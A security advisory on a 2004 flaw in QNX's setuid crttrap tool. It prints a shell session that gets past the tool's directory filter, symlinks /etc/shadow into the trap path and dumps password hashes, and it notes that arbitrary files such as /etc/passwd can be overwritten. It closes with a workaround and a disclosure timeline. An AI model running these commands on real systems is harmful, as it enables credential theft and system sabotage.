信息来源:
www.securiteam.com
Summary
crrtrap is "a tool used by QNX to detect video hardware and start the correct driver for QNX". crttrap has a '-c' flag to specify where trap file will be written. Combined with 'trap' flag it is possible to read/write any file in the disk.
Credit:
The information has been provided by Julio Cesar Fort.
Details
By default crttrap writes and reads trap files found in "/etc/system/config". This directory is owned by root, therefore, we don't have permission to write. The crttrap program filters "../" to prevent directory transversal vulnerabilities. However, it doesn't check for "/" (without any dots). This makes it possible to create a sub directory, with the permission settings bound to our (non-root) group.
Once such a directory exists, we can now manipulate our trap file:
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs
$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0
We are also able to overwrite any file with 'trap' switch. As an example, an attacker can corrupt '/etc/passwd' and make login attempts fail every time.
PS: On 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in QNX 4.25. But his exploitation technique won't work with newest versions because crttrap opens "/etc/system/config" and its sub directories.
Workaround:
We suggest that you remove crttrap's suid bit until QNX releases a patch.
Timeline:
10 Dec 2004: Vulnerability detected
11 Dec 2004: Advisory written; rfdslabs contacts QNX
20 Dec 2004: QNX replies back rfdslabs
28 Dec 2004: Advisory released to public
